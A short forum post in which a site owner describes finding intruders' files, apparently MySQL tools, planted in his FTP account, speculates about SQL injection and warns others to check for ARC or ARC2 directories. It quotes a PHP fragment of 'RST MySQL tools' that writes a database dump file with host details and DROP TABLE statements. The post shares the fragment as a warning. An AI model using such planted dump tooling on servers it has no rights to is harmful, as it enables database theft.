So thanks to a warning of WhiteShepherd, I decided to check out and seems some russians entered my account (thanks god, they havent destroyed the website) and started to put weird configuration files and a halluva ammount of warez in my ftp directory.
no idea how they got in, but the files and configuraiton files are all mysql related. so I suspect it was a SQL injection?
just a warning to everyone, check out if you have an ARC or ARC2 directory in your ftp accounts.
the interesting thing is, all the files they put inside, were clearly signed by a russian "security" team. not sure if they're whitehats or blackhats.
anyway the code of one of their files just incase... (since I've deleted everything..)
// îòêðûâàåì ôàéë äëÿ çàïèñè äàìïà
$fp = fopen($file, "w");
fputs ($fp, "# RST MySQL tools\n# Home page: http://rst.void.ru\n#\n# Host settings:\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
date("F j, Y, g:i a")."\n# ".$host." (".$ip.")"." dump db \"".$db."\"\n#____________________________________________________________\n\n");
foreach($tabs as $tab) {
if ($add_drop) {
fputs($fp, "DROP TABLE IF EXISTS `".$tab."`;\n");
note how they link to rst.void.ru
